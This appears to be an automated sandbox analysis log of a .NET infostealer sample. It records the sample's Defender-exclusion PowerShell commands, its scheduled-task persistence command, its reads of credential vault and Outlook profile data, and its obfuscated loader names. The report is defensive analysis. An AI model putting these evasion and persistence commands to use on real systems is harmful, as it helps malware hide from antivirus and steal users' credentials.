                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: msasn1.dll
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.lnYkIr.exe.441fa30.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 14.2.lnYkIr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.lnYkIr.exe.445b050.12.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.lnYkIr.exe.445b050.12.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.lnYkIr.exe.441fa30.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: lnYkIr.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, Lds5plxAPDj.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, LZYJybC.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, wDxPSW1p.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, E0w8WLnyggK.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, ZBSJHga2buE.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, M4oIYVa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, kSS2HMsB8.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, kSS2HMsB8.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, B54uhvmGLlyX4pN6ow.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, AfUbALyC500FynBqvI.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, AfUbALyC500FynBqvI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, AfUbALyC500FynBqvI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, B54uhvmGLlyX4pN6ow.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, AfUbALyC500FynBqvI.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, AfUbALyC500FynBqvI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, AfUbALyC500FynBqvI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@2/2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeFile created: C:\Users\user\AppData\Roaming\lnYkIr.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1084:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeMutant created: \Sessions\1\BaseNamedObjects\UlgJvs
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9C71.tmpJump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeReversingLabs: Detection: 28%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\lnYkIr.exe C:\Users\user\AppData\Roaming\lnYkIr.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess created: C:\Users\user\AppData\Roaming\lnYkIr.exe C:\Users\user\AppData\Roaming\lnYkIr.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmpJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess created: C:\Users\user\AppData\Roaming\lnYkIr.exe C:\Users\user\AppData\Roaming\lnYkIr.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: sKdvLcn.pdb source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, lnYkIr.exe.0.dr
                    Source: Binary string: sKdvLcn.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, lnYkIr.exe.0.dr

                    Data Obfuscation

                    barindex
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, AfUbALyC500FynBqvI.cs.Net Code: bKmRjtHvbX System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, AfUbALyC500FynBqvI.cs.Net Code: bKmRjtHvbX System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.2df41e8.5.raw.unpack, Ar.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_02BFA448 pushad ; ret 0_2_02BFA449
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_0B7F37DD push FFFFFF8Bh; iretd 0_2_0B7F37DF
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 9_2_030D0708 push eax; ret 9_2_030D0712
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 9_2_030D0718 push eax; ret 9_2_030D0722
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 9_2_030D0728 push eax; ret 9_2_030D0732
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 9_2_030D06C8 push eax; ret 9_2_030D0702
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 9_2_06FD8FF0 pushfd ; retf 9_2_06FD8FFD
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_0176A44A push eax; ret 10_2_0176A451
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_0176A448 pushad ; ret 10_2_0176A449
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_0A6824B5 push FFFFFF8Bh; iretd 10_2_0A6824B7
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 14_2_01330718 push eax; ret 14_2_01330722
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 14_2_01330708 push eax; ret 14_2_01330712
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 14_2_01330698 push eax; ret 14_2_01330712
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 14_2_01330698 push eax; ret 14_2_01330732
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 14_2_013306C8 push eax; ret 14_2_01330702
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeStatic PE information: section name: .text entropy: 7.900652138585597
                    Source: lnYkIr.exe.0.drStatic PE information: section name: .text entropy: 7.900652138585597
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, Y2xhaHzpVWr0qPqPe5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'roQ0oNhaND', 'lcA0r2LlDp', 'JmR0BjiLGy', 'r7j06otRwI', 'Rld0vHVUtW', 'u2W00jaLyM', 'vUR0VAneCa'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, uSWedTON0pZsaQDlE7.csHigh entropy of concatenated method names: 'ToString', 'iZ0BiQxM4I', 'q9fBW589D3', 'ClfBK3sN1E', 'voJBFrTTpT', 'dWcBtSjELU', 'bZFBkQ4i6N', 'r9gBLrNNRg', 'TrvB3jjSVx', 'sHnB7jH9XC'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, elDDp3HPIobioVFnqi.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YwKpwJPng2', 'S17pZGW9R2', 'I5bpzOhQuE', 'sDcUagCe6e', 'odeU4Rf2mD', 'rxXUpLgTRe', 'EssUUmSCYJ', 'bCWWOwWwyoxWFlxFFKx'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, M4CJD2cOceSjToPAu1.csHigh entropy of concatenated method names: 'Dispose', 'xhe4weBFJG', 'j8mpWwc3T2', 'cMP88Ct8gZ', 'p0R4ZcEy9O', 'BwT4zCDIhE', 'ProcessDialogKey', 'ffYpa9cqyC', 'LGFp4gxtdi', 'fSIppoAiv9'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, AcxjPt4arkHdo90ERvm.csHigh entropy of concatenated method names: 'WHZ0Y7UAYp', 'jrI0DX47wT', 't560jFmNWg', 'Tdf0GVBV7U', 'E3V0Tm4ohL', 'dF00ut0IWl', 'pCS0beK32v', 'gfV0mi2gdM', 'JJh0fAhUNL', 'kIW0ximueC'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, B54uhvmGLlyX4pN6ow.csHigh entropy of concatenated method names: 'km7c9pvgod', 'uJQc1iuFU4', 'KY3cOURNCJ', 'SQ8c8g1akg', 'T3mce2YRgE', 'nhvcPQCilT', 'QJEcAHfxIT', 'inHcCRUX4X', 'tM8cwj5Tli', 'YGYcZPKRTh'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, fRACX4xPO18mSo9ekl.csHigh entropy of concatenated method names: 'Fev5TXYnxG', 'aYj5b2WIDw', 'JKtHKxoYAF', 'VbhHFwxNwF', 'hOYHtZK4TB', 'bYSHk2pKrb', 'EwgHLaLNrR', 'B63H39SR9M', 'OriH7W8Nnt', 'f7FHQUvLyg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, x9cqyCwLGFgxtdilSI.csHigh entropy of concatenated method names: 'XcRvghc9G9', 'pTRvW0XQGp', 'eifvKRW8v1', 'JTEvFmrXYI', 'L3dv9mcStw', 'dLZvtuncme', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, zXIgiB4p7fQ4TwLhUoH.csHigh entropy of concatenated method names: 'rp6VYRi78Y', 'UtQVDMbRuX', 'FBCVj9GjLv', 'CrENuxqmAvX5aN6qVXI', 'kB9XioqlMlTn2Bnlx4O', 'j3hP9mqU4NI7DPrbyEn', 'whYvyGqHoFbWlwooZIg', 'AsjXpGqhchxZPA5MwYJ'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, uOikXZRACP8fm5xu2c.csHigh entropy of concatenated method names: 'aTT4X54uhv', 'ALl4yyX4pN', 'LRY4n2JI2y', 'mOJ42NcRAC', 'o9e4rklstO', 'wZ64BREl3C', 'gcQpHNSptCWOA1KF2T', 'IMjPbHXN7HF8MSfHvM', 'DDqnfhK3LoRQZO0GN3', 's7n440L0DI'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, TR2kGu4UvRae0cmEBUc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kvSV9ZgSr9', 'syAV19mfbk', 'wLEVOhgnGP', 'yd4V89D8po', 'ETTVeuKvZc', 'yppVPVZwtT', 'Ah2VAbIqRm'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, nAiv9FZhRaIO79efY1.csHigh entropy of concatenated method names: 'gRN04fHUox', 'XGV0UkMy5P', 'kxH0RKSDmf', 'cQZ0lfhQ8E', 'JRW0cQOaaI', 'vEa0557Qof', 'rSE0q5rF74', 'PFHvA7gNGu', 'lZ4vCja3i0', 'FZavwxALT8'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, Pp43I3Lx3ZeQKe9E6s.csHigh entropy of concatenated method names: 'u6VXlU1R5c', 'J8nXHmrjgR', 'XR5Xqa2Wv1', 'RT8qZIhcVO', 'HEwqzFlFYv', 'EWSXaCQ2bt', 'wMQX4Bj2m7', 'A2kXpUOqa8', 'IvHXUL3aht', 'ho4XRXPJEB'
